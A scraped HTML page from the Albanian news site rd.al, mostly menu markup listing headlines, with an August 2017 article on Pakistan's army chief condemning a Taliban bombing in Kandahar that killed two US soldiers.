                <h3 class="entry-title td-module-title"><a href="http://www.rd.al/2017/08/mundet-vucic-te-behet-de-gaulle-serbise-per-kosoven/" rel="bookmark" title="Mundet Vuçiç të bëhet De Gaulle i Serbisë për Kosovën?">Mundet Vuçiç të bëhet De Gaulle i Serbisë për Kosovën?</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.rd.al/2017/08/shteti-jashteligjor-edi-rames/" rel="bookmark" title="Shteti jashtëligjor i Edi Ramës"><img width="218" height="150" class="entry-thumb" src="http://www.rd.al/wp-content/uploads/2017/05/rama-sot-218x150.jpg" alt="" title="Shteti jashtëligjor i Edi Ramës"/></a></div>                <a href="http://www.rd.al/category/editorial/" class="td-post-category">Editorial</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.rd.al/2017/08/shteti-jashteligjor-edi-rames/" rel="bookmark" title="Shteti jashtëligjor i Edi Ramës">Shteti jashtëligjor i Edi Ramës</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.rd.al/2017/07/problemi-jeni-ju-zoti-kryeminister/" rel="bookmark" title="Problemi jeni Ju, zoti Kryeministër!"><img width="218" height="150" class="entry-thumb" src="http://www.rd.al/wp-content/uploads/2017/05/rama-qan-218x150.jpg" alt="" title="Problemi jeni Ju, zoti Kryeministër!"/></a></div>                <a href="http://www.rd.al/category/editorial/" class="td-post-category">Editorial</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.rd.al/2017/07/problemi-jeni-ju-zoti-kryeminister/" rel="bookmark" title="Problemi jeni Ju, zoti Kryeministër!">Problemi jeni Ju, zoti Kryeministër!</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.rd.al/2017/07/kosova-ska-qen/" rel="bookmark" title="Kosova s’ka qen"><img width="218" height="150" class="entry-thumb" src="http://www.rd.al/wp-content/uploads/2016/03/edison-ypi-218x150.jpg" alt="" title="Kosova s’ka qen"/></a></div>                <a href="http://www.rd.al/category/editorial/" class="td-post-category">Editorial</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.rd.al/2017/07/kosova-ska-qen/" rel="bookmark" title="Kosova s’ka qen">Kosova s’ka qen</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.rd.al/2017/07/kryesia-nuk-eshte-kusht-per-te-qene-demokrat-2/" rel="bookmark" title="Kryesia nuk është kusht për të qenë demokrat"><img width="218" height="150" class="entry-thumb" src="http://www.rd.al/wp-content/uploads/2016/05/PD-selia-218x150.jpg" alt="" title="Kryesia nuk është kusht për të qenë demokrat"/></a></div>                <a href="http://www.rd.al/category/editorial/" class="td-post-category">Editorial</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.rd.al/2017/07/kryesia-nuk-eshte-kusht-per-te-qene-demokrat-2/" rel="bookmark" title="Kryesia nuk është kusht për të qenë demokrat">Kryesia nuk është kusht për të qenë demokrat</a></h3>            </div>
        </div>
        </div></div></div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_2_5984b16936458" data-td_block_id="td_uid_2_5984b16936458"><i class="td-icon-font td-icon-menu-left"></i></a><a href="#"  class="td-ajax-next-page" id="next-page-td_uid_2_5984b16936458" data-td_block_id="td_uid_2_5984b16936458"><i class="td-icon-font td-icon-menu-right"></i></a></div><div class="clearfix"></div></div> <!-- ./block1 --></div></div></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-mega-menu menu-item-283"><a href="http://www.rd.al/category/aktualitet/">Aktualitet</a>
<ul class="sub-menu">
	<li class="menu-item-0"><div class="td-container-border"><div class="td-mega-grid"><script>var block_td_uid_3_5984b16938cdb = new tdBlock();
block_td_uid_3_5984b16938cdb.id = "td_uid_3_5984b16938cdb";
block_td_uid_3_5984b16938cdb.atts = '{"limit":"5","td_column_number":3,"ajax_pagination":"next_prev","category_id":"14","show_child_cat":30,"td_ajax_filter_type":"td_category_ids_filter","td_ajax_preloading":"","class":"td_uid_3_5984b16938cdb_rand"}';
block_td_uid_3_5984b16938cdb.td_column_number = "3";
block_td_uid_3_5984b16938cdb.block_type = "td_block_mega_menu";
block_td_uid_3_5984b16938cdb.post_count = "5";
block_td_uid_3_5984b16938cdb.found_posts = "2692";
block_td_uid_3_5984b16938cdb.header_color = "";
block_td_uid_3_5984b16938cdb.ajax_pagination_infinite_stop = "";
block_td_uid_3_5984b16938cdb.max_num_pages = "539";
tdBlocksArray.push(block_td_uid_3_5984b16938cdb);
</script><div class="td_block_wrap td_block_mega_menu td_uid_3_5984b16938cdb_rand  td-no-subcats td_with_ajax_pagination td-pb-border-top"><div id=td_uid_3_5984b16938cdb class="td_block_inner"><div class="td-mega-row"><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.rd.al/2017/08/flaket-djegin-qeverine/" rel="bookmark" title="Flakët “djegin” qeverinë"><img width="218" height="150" class="entry-thumb" src="http://www.rd.al/wp-content/uploads/2017/07/zjarr-ibe-218x150.jpg" alt="" title="Flakët “djegin” qeverinë"/></a></div>                <a href="http://www.rd.al/category/aktualitet/" class="td-post-category">Aktualitet</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.rd.al/2017/08/flaket-djegin-qeverine/" rel="bookmark" title="Flakët “djegin” qeverinë">Flakët “djegin” qeverinë</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.rd.al/2017/08/britania-kriminelet-shqiptare-te-lidhur-mafian-latine/" rel="bookmark" title="Britania: Kriminelët shqiptarë të lidhur me mafian latine"><img width="218" height="150" class="entry-thumb" src="http://www.rd.al/wp-content/uploads/2017/08/shqiptaret-para-218x150.jpg" alt="" title="Britania: Kriminelët shqiptarë të lidhur me mafian latine"/></a></div>                <a href="http://www.rd.al/category/aktualitet/" class="td-post-category">Aktualitet</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.rd.al/2017/08/britania-kriminelet-shqiptare-te-lidhur-mafian-latine/" rel="bookmark" title="Britania: Kriminelët shqiptarë të lidhur me mafian latine">Britania: Kriminelët shqiptarë të lidhur me mafian latine</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.rd.al/2017/08/jo-vetem-zjarre-por-edhe-krize-energjetike/" rel="bookmark" title="Jo vetëm zjarre por edhe krizë energjetike"><img width="218" height="150" class="entry-thumb" src="http://www.rd.al/wp-content/uploads/2017/08/kaskada-e-drinit-218x150.jpg" alt="" title="Jo vetëm zjarre por edhe krizë energjetike"/></a></div>                <a href="http://www.rd.al/category/aktualitet/" class="td-post-category">Aktualitet</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.rd.al/2017/08/jo-vetem-zjarre-por-edhe-krize-energjetike/" rel="bookmark" title="Jo vetëm zjarre por edhe krizë energjetike">Jo vetëm zjarre por edhe krizë energjetike</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.rd.al/2017/08/serbia-pergjigjet-kroacise-per-ekstradimin-e-ballist-morines/" rel="bookmark" title="Serbia i përgjigjet Kroacisë për ekstradimin e “Ballist” Morinës"><img width="218" height="150" class="entry-thumb" src="http://www.rd.al/wp-content/uploads/2017/08/ballist-morina-218x150.jpg" alt="" title="Serbia i përgjigjet Kroacisë për ekstradimin e “Ballist” Morinës"/></a></div>                <a href="http://www.rd.al/category/aktualitet/" class="td-post-category">Aktualitet</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.rd.al/2017/08/serbia-pergjigjet-kroacise-per-ekstradimin-e-ballist-morines/" rel="bookmark" title="Serbia i përgjigjet Kroacisë për ekstradimin e “Ballist” Morinës">Serbia i përgjigjet Kroacisë për ekstradimin e “Ballist” Morinës</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.rd.al/2017/08/pence-ndertoni-qeveri-te-besueshme/" rel="bookmark" title="Pence: Ndërtoni qeveri të besueshme"><img width="218" height="150" class="entry-thumb" src="http://www.rd.al/wp-content/uploads/2017/08/mike-pence-montenegro-1-218x150.jpg" alt="" title="Pence: Ndërtoni qeveri të besueshme"/></a></div>                <a href="http://www.rd.al/category/aktualitet/" class="td-post-category">Aktualitet</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.rd.al/2017/08/pence-ndertoni-qeveri-te-besueshme/" rel="bookmark" title="Pence: Ndërtoni qeveri të besueshme">Pence: Ndërtoni qeveri të besueshme</a></h3>            </div>
        </div>
        </div></div></div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_3_5984b16938cdb" data-td_block_id="td_uid_3_5984b16938cdb"><i class="td-icon-font td-icon-menu-left"></i></a><a href="#"  class="td-ajax-next-page" id="next-page-td_uid_3_5984b16938cdb" data-td_block_id="td_uid_3_5984b16938cdb"><i class="td-icon-font td-icon-menu-right"></i></a></div><div class="clearfix"></div></div> <!-- ./block1 --></div></div></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-mega-menu menu-item-325"><a href="http://www.rd.al/category/ekonomi/">Ekonomi</a>
<ul class="sub-menu">
	<li class="menu-item-0"><div class="td-container-border"><div class="td-mega-grid"><script>var block_td_uid_4_5984b1693d306 = new tdBlock();
block_td_uid_4_5984b1693d306.id = "td_uid_4_5984b1693d306";
block_td_uid_4_5984b1693d306.atts = '{"limit":"5","td_column_number":3,"ajax_pagination":"next_prev","category_id":"15","show_child_cat":30,"td_ajax_filter_type":"td_category_ids_filter","td_ajax_preloading":"","class":"td_uid_4_5984b1693d306_rand"}';
block_td_uid_4_5984b1693d306.td_column_number = "3";
block_td_uid_4_5984b1693d306.block_type = "td_block_mega_menu";
block_td_uid_4_5984b1693d306.post_count = "5";
block_td_uid_4_5984b1693d306.found_posts = "1259";
block_td_uid_4_5984b1693d306.header_color = "";
block_td_uid_4_5984b1693d306.ajax_pagination_infinite_stop = "";
block_td_uid_4_5984b1693d306.max_num_pages = "252";
tdBlocksArray.push(block_td_uid_4_5984b1693d306);
</script><div class="td_block_wrap td_block_mega_menu td_uid_4_5984b1693d306_rand  td-no-subcats td_with_ajax_pagination td-pb-border-top"><div id=td_uid_4_5984b1693d306 class="td_block_inner"><div class="td-mega-row"><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.rd.al/2017/08/evazioni-fiskal-kap-majat-52-e-refuzojne-kuponin/" rel="bookmark" title="Evazioni fiskal kap majat, 52% e refuzojnë kuponin"><img width="218" height="150" class="entry-thumb" src="http://www.rd.al/wp-content/uploads/2016/04/kuponi-tatimor-218x150.jpg" alt="" title="Evazioni fiskal kap majat, 52% e refuzojnë kuponin"/></a></div>                <a href="http://www.rd.al/category/ekonomi/" class="td-post-category">Ekonomi</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.rd.al/2017/08/evazioni-fiskal-kap-majat-52-e-refuzojne-kuponin/" rel="bookmark" title="Evazioni fiskal kap majat, 52% e refuzojnë kuponin">Evazioni fiskal kap majat, 52% e refuzojnë kuponin</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.rd.al/2017/08/gropa-ne-dogana-10-milione-dollare-pak-per-muajin-korrik/" rel="bookmark" title="Gropa në dogana, 10 milionë dollarë më pak për muajin korrik"><img width="218" height="150" class="entry-thumb" src="http://www.rd.al/wp-content/uploads/2017/08/leke-buxheti-218x150.jpg" alt="" title="Gropa në dogana, 10 milionë dollarë më pak për muajin korrik"/></a></div>                <a href="http://www.rd.al/category/ekonomi/" class="td-post-category">Ekonomi</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.rd.al/2017/08/gropa-ne-dogana-10-milione-dollare-pak-per-muajin-korrik/" rel="bookmark" title="Gropa në dogana, 10 milionë dollarë më pak për muajin korrik">Gropa në dogana, 10 milionë dollarë më pak për muajin korrik</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.rd.al/2017/08/rritja-e-kostos-subvencion-per-vjedhesit/" rel="bookmark" title="Rritja e kostos, subvencion për vjedhësit"><img width="218" height="150" class="entry-thumb" src="http://www.rd.al/wp-content/uploads/2017/08/Bashkia-korrekt-218x150.jpg" alt="" title="Rritja e kostos, subvencion për vjedhësit"/></a></div>                <a href="http://www.rd.al/category/ekonomi/" class="td-post-category">Ekonomi</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.rd.al/2017/08/rritja-e-kostos-subvencion-per-vjedhesit/" rel="bookmark" title="Rritja e kostos, subvencion për vjedhësit">Rritja e kostos, subvencion për vjedhësit</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.rd.al/2017/08/ne-6-muaj-con-ne-prokurori-178-raste-per-pastrim-parash/" rel="bookmark" title="Në 6 muaj çon në Prokurori 178 raste për pastrim parash"><img width="218" height="150" class="entry-thumb" src="http://www.rd.al/wp-content/uploads/2017/08/para45-218x150.jpg" alt="" title="Në 6 muaj çon në Prokurori 178 raste për pastrim parash"/></a></div>                <a href="http://www.rd.al/category/ekonomi/" class="td-post-category">Ekonomi</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.rd.al/2017/08/ne-6-muaj-con-ne-prokurori-178-raste-per-pastrim-parash/" rel="bookmark" title="Në 6 muaj çon në Prokurori 178 raste për pastrim parash">Në 6 muaj çon në Prokurori 178 raste për pastrim parash</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.rd.al/2017/07/bizneset-kane-humbur-besimin-tek-ekonomia/" rel="bookmark" title="Bizneset kanë humbur besimin tek ekonomia"><img width="218" height="150" class="entry-thumb" src="http://www.rd.al/wp-content/uploads/2016/04/biznes-1-218x150.jpg" alt="" title="Bizneset kanë humbur besimin tek ekonomia"/></a></div>                <a href="http://www.rd.al/category/ekonomi/" class="td-post-category">Ekonomi</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.rd.al/2017/07/bizneset-kane-humbur-besimin-tek-ekonomia/" rel="bookmark" title="Bizneset kanë humbur besimin tek ekonomia">Bizneset kanë humbur besimin tek ekonomia</a></h3>            </div>
        </div>
        </div></div></div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_4_5984b1693d306" data-td_block_id="td_uid_4_5984b1693d306"><i class="td-icon-font td-icon-menu-left"></i></a><a href="#"  class="td-ajax-next-page" id="next-page-td_uid_4_5984b1693d306" data-td_block_id="td_uid_4_5984b1693d306"><i class="td-icon-font td-icon-menu-right"></i></a></div><div class="clearfix"></div></div> <!-- ./block1 --></div></div></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-mega-menu menu-item-297"><a href="http://www.rd.al/category/sociale/">Sociale</a>
<ul class="sub-menu">
	<li class="menu-item-0"><div class="td-container-border"><div class="td-mega-grid"><script>var block_td_uid_5_5984b169403f6 = new tdBlock();
block_td_uid_5_5984b169403f6.id = "td_uid_5_5984b169403f6";
block_td_uid_5_5984b169403f6.atts = '{"limit":"5","td_column_number":3,"ajax_pagination":"next_prev","category_id":"22","show_child_cat":30,"td_ajax_filter_type":"td_category_ids_filter","td_ajax_preloading":"","class":"td_uid_5_5984b169403f6_rand"}';
block_td_uid_5_5984b169403f6.td_column_number = "3";
block_td_uid_5_5984b169403f6.block_type = "td_block_mega_menu";
block_td_uid_5_5984b169403f6.post_count = "5";
block_td_uid_5_5984b169403f6.found_posts = "503";
block_td_uid_5_5984b169403f6.header_color = "";
block_td_uid_5_5984b169403f6.ajax_pagination_infinite_stop = "";
block_td_uid_5_5984b169403f6.max_num_pages = "101";
tdBlocksArray.push(block_td_uid_5_5984b169403f6);
</script><div class="td_block_wrap td_block_mega_menu td_uid_5_5984b169403f6_rand  td-no-subcats td_with_ajax_pagination td-pb-border-top"><div id=td_uid_5_5984b169403f6 class="td_block_inner"><div class="td-mega-row"><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.rd.al/2017/08/pushuesit-ne-rrezik-bregun-e-pushtojne-jet-ski-te-2016-u-15-fishuan-importet/" rel="bookmark" title="Pushuesit në rrezik, bregun e pushtojnë “jet-ski”-të, më 2016 u 15-fishuan importet"><img width="218" height="150" class="entry-thumb" src="http://www.rd.al/wp-content/uploads/2017/08/mottor-uji-218x150.jpg" alt="" title="Pushuesit në rrezik, bregun e pushtojnë “jet-ski”-të, më 2016 u 15-fishuan importet"/></a></div>                <a href="http://www.rd.al/category/sociale/" class="td-post-category">Sociale</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.rd.al/2017/08/pushuesit-ne-rrezik-bregun-e-pushtojne-jet-ski-te-2016-u-15-fishuan-importet/" rel="bookmark" title="Pushuesit në rrezik, bregun e pushtojnë “jet-ski”-të, më 2016 u 15-fishuan importet">Pushuesit në rrezik, bregun e pushtojnë “jet-ski”-të, më 2016 u 15-fishuan&#8230;</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.rd.al/2017/08/cfare-po-ndodh-ilacet-dhe-farmacistet/" rel="bookmark" title="Çfarë po ndodh me ilaçet dhe farmacistët"><img width="218" height="150" class="entry-thumb" src="http://www.rd.al/wp-content/uploads/2017/08/farmaciste-218x150.jpg" alt="" title="Çfarë po ndodh me ilaçet dhe farmacistët"/></a></div>                <a href="http://www.rd.al/category/sociale/" class="td-post-category">Sociale</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.rd.al/2017/08/cfare-po-ndodh-ilacet-dhe-farmacistet/" rel="bookmark" title="Çfarë po ndodh me ilaçet dhe farmacistët">Çfarë po ndodh me ilaçet dhe farmacistët</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.rd.al/2017/08/shqipera-e-dyta-ne-europe-rezerva-te-ujit-prape-skemi-uje-te-pijshem/" rel="bookmark" title="Shqipëra, e dyta në Europë me rezerva të ujit, prapë s&#8217;kemi ujë të pijshëm"><img width="218" height="150" class="entry-thumb" src="http://www.rd.al/wp-content/uploads/2017/08/BOVILLE-218x150.jpg" alt="" title="Shqipëra, e dyta në Europë me rezerva të ujit, prapë s&#8217;kemi ujë të pijshëm"/></a></div>                <a href="http://www.rd.al/category/sociale/" class="td-post-category">Sociale</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.rd.al/2017/08/shqipera-e-dyta-ne-europe-rezerva-te-ujit-prape-skemi-uje-te-pijshem/" rel="bookmark" title="Shqipëra, e dyta në Europë me rezerva të ujit, prapë s&#8217;kemi ujë të pijshëm">Shqipëra, e dyta në Europë me rezerva të ujit, prapë s&#8217;kemi&#8230;</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.rd.al/2017/08/mish-pule-nga-brazili-ende-ne-tregun-shqiptar-evropa-vijon-refuzimin-masiv/" rel="bookmark" title="Mish pule nga Brazili ende në tregun shqiptar? Evropa vijon refuzimin masiv"><img width="218" height="150" class="entry-thumb" src="http://www.rd.al/wp-content/uploads/2017/05/mish-pule1-218x150.jpg" alt="" title="Mish pule nga Brazili ende në tregun shqiptar? Evropa vijon refuzimin masiv"/></a></div>                <a href="http://www.rd.al/category/sociale/" class="td-post-category">Sociale</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.rd.al/2017/08/mish-pule-nga-brazili-ende-ne-tregun-shqiptar-evropa-vijon-refuzimin-masiv/" rel="bookmark" title="Mish pule nga Brazili ende në tregun shqiptar? Evropa vijon refuzimin masiv">Mish pule nga Brazili ende në tregun shqiptar? Evropa vijon refuzimin&#8230;</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.rd.al/2017/08/koncesioni-dializes-realizon-380-mije-euro-fitime-ende-pa-nisur-mire-punen/" rel="bookmark" title="Koncesioni i dializës realizon 380 mijë euro fitime ende pa nisur mirë punën"><img width="218" height="150" class="entry-thumb" src="http://www.rd.al/wp-content/uploads/2017/08/rama-beqja-218x150.jpg" alt="" title="Koncesioni i dializës realizon 380 mijë euro fitime ende pa nisur mirë punën"/></a></div>                <a href="http://www.rd.al/category/sociale/" class="td-post-category">Sociale</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.rd.al/2017/08/koncesioni-dializes-realizon-380-mije-euro-fitime-ende-pa-nisur-mire-punen/" rel="bookmark" title="Koncesioni i dializës realizon 380 mijë euro fitime ende pa nisur mirë punën">Koncesioni i dializës realizon 380 mijë euro fitime ende pa nisur&#8230;</a></h3>            </div>
        </div>
        </div></div></div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_5_5984b169403f6" data-td_block_id="td_uid_5_5984b169403f6"><i class="td-icon-font td-icon-menu-left"></i></a><a href="#"  class="td-ajax-next-page" id="next-page-td_uid_5_5984b169403f6" data-td_block_id="td_uid_5_5984b169403f6"><i class="td-icon-font td-icon-menu-right"></i></a></div><div class="clearfix"></div></div> <!-- ./block1 --></div></div></li>
</ul>
</li>
<li class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-194"><a href="http://www.rd.al/index.php/kontakt/">Kontakt</a></li>
<li class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-539"><a href="http://www.rilindjademokratike.com/">Arkivë</a></li>
</ul></div></div>


<div class="td-search-wrapper">
    <div id="td-top-search">
        <!-- Search -->
        <div class="header-search-wrap">
            <div class="dropdown header-search">
                <a id="td-header-search-button" href="#" role="button" class="dropdown-toggle " data-toggle="dropdown"><i class="td-icon-search"></i></a>
            </div>
        </div>
    </div>
</div>

<div class="header-search-wrap">
	<div class="dropdown header-search">
		<div class="td-drop-down-search" aria-labelledby="td-header-search-button">
			<form role="search" method="get" class="td-search-form" action="http://www.rd.al/">
				<div class="td-head-form-search-wrap">
					<input id="td-header-search" type="text" value="" name="s" autocomplete="off" /><input class="wpb_button wpb_btn-inverse btn" type="submit" id="td-header-search-top" value="Kërko" />
				</div>
			</form>
			<div id="td-aj-search"></div>
		</div>
	</div>
</div>            </div>
        </div>
    </div>

</div><div class="td-main-content-wrap">

    <div class="td-container td-post-template-default ">
        <div class="td-crumb-container"></div>

        <div class="td-pb-row">
                                    <div class="td-pb-span8 td-main-content" role="main">
                            <div class="td-ss-main-content">
                                
    <article id="post-47960" class="post-47960 post type-post status-publish format-standard has-post-thumbnail hentry category-botarajoni" itemscope itemtype="http://schema.org/Article">
        <div class="td-post-header">

            <ul class="td-category"><li class="entry-category"><a  href="http://www.rd.al/category/botarajoni/">Bota &amp; Rajoni</a></li></ul>
            <header class="td-post-title">
                <h1 class="entry-title">Reagimi i rrallë i gjeneralit pakistanez për vrasjen e amerikanëve</h1>

                

                <div class="td-module-meta-info">
                                        <div class="td-post-date"><time class="entry-date updated td-module-date" datetime="2017-08-04T19:33:45+00:00" >04/08/2017</time></div>                                        <div class="td-post-views"><i class="td-icon-views"></i><span class="td-nr-views-47960">5</span></div>                </div>

            </header>

        </div>

        

        <div class="td-post-content">

        <div class="td-post-featured-image"><a href="http://www.rd.al/wp-content/uploads/2017/08/gjenerali-pakistanez.jpg" data-caption=""><img width="696" height="391" class="entry-thumb td-modal-image" src="http://www.rd.al/wp-content/uploads/2017/08/gjenerali-pakistanez-696x391.jpg" alt="" title="gjenerali pakistanez"/></a></div>
        <p>Në një lëvizje të pazakontë, shefi ushtarak i Pakistanit dënoi të enjten duke e vlerësuar si terrorizëm sulmin taleban në Afganistanin fqinj, në të cilin u vranë dy pjesëtarë të forcave ushtarake amerikane dhe katër të tjerë u plagosën.<br />
Komenti i gjeneralit Qamar Javed Bajwa që dënonte sulmin, erdhi në një ditë kur i dërguari i posaçëm i SHBA për rajonin Alice Wells, nisi një vizitë zyrtare dyditore në Islamabad, për të diskutuar ndër të tjera çështje dhe mënyrat për t’i dhënë fund konfliktit të armatosur afgan.<br />
&#8220;Ne e kuptojmë plotësisht humbjen dhe dhembjen e familjarëve të viktimave, ndërsa Pakistani po përjeton një situatë të ngjashme me dhunë në luftën kundër kërcënimit të përbashkët terrorist&#8221;, thuhet në një deklaratë të ushtrisë pakistaneze që citon gjeneralin pakistanez.<br />
Gjenerali pakistanez ofroi ngushëllime &#8220;të përzemërta&#8221; për vdekjen e dy ushtarëve amerikanë.<br />
Talebanët islamikë e morën menjëherë përgjegjësinë për sulmin e së mërkurës me autobombë në qytetin jugor të Afganistanit në Kandahar, ndaj një autokolone të NATO-s.<br />
Një zëdhënës i talebanëve tha se 15 ushtarë që i përkisnin &#8220;forcave të huaja pushtuese&#8221;, përfshirë dy oficerë &#8220;të rangut të lartë&#8221;, u vranë. Si forcë pushtuese grupi kryengritës i referohet misionit ushtarak të NATO-s të udhëhequr nga Shtetet e Bashkuara në Afganistan.<br />
Talebanët janë të njohur për fryrjen që u bëjnë shifrave që lidhen me numrin e viktimave.<br />
Zyrtarët amerikanë dhe afganë kanë pohuar prej kohësh që ushtria pakistaneze ka mbështetur dhe strehuar fshehurazi krerët talebanë dhe anëtarët e rrjetit të Haqqanit, duke komplotuar sulme vdekjeprurëse kundër forcave vendase dhe ndërkombëtare.<br />
Islamabadi i ka hedhur poshtë akuzat dhe thotë se po bën të gjitha përpjekjet e mundshme për të siguruar kufirin me Afganistanin dhe për të nxitur paqen dhe pajtimin mes palëve ndërluftuese në vendin fqinj.</p>
        </div>


        <footer>
                        
            <div class="td-post-source-tags">
                                            </div>

            <div class="td-post-sharing td-post-sharing-bottom "><span class="td-post-share-title">SHARE</span>
            <div class="td-default-sharing">
	            <a class="td-social-sharing-buttons td-social-facebook" href="http://www.facebook.com/sharer.php?u=http%3A%2F%2Fwww.rd.al%2F2017%2F08%2Freagimi-rralle-gjeneralit-pakistanez-per-vrasjen-e-amerikaneve%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-facebook"></i><div class="td-social-but-text">Facebook</div></a>
	            <a class="td-social-sharing-buttons td-social-twitter" href="https://twitter.com/intent/tweet?text=Reagimi+i+rrall%C3%AB+i+gjeneralit+pakistanez+p%C3%ABr+vrasjen+e+amerikan%C3%ABve&url=http%3A%2F%2Fwww.rd.al%2F2017%2F08%2Freagimi-rralle-gjeneralit-pakistanez-per-vrasjen-e-amerikaneve%2F&via=Rilindja+Demokratike"><i class="td-icon-twitter"></i><div class="td-social-but-text">Twitter</div></a>
	            <a class="td-social-sharing-buttons td-social-google" href="http://plus.google.com/share?url=http://www.rd.al/2017/08/reagimi-rralle-gjeneralit-pakistanez-per-vrasjen-e-amerikaneve/" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-googleplus"></i></a>
	          
	            <a class="td-social-sharing-buttons td-social-whatsapp" href="whatsapp://send?text=Reagimi+i+rrall%C3%AB+i+gjeneralit+pakistanez+p%C3%ABr+vrasjen+e+amerikan%C3%ABve - http%3A%2F%2Fwww.rd.al%2F2017%2F08%2Freagimi-rralle-gjeneralit-pakistanez-per-vrasjen-e-amerikaneve%2F" ><i class="td-icon-whatsapp"></i></a>
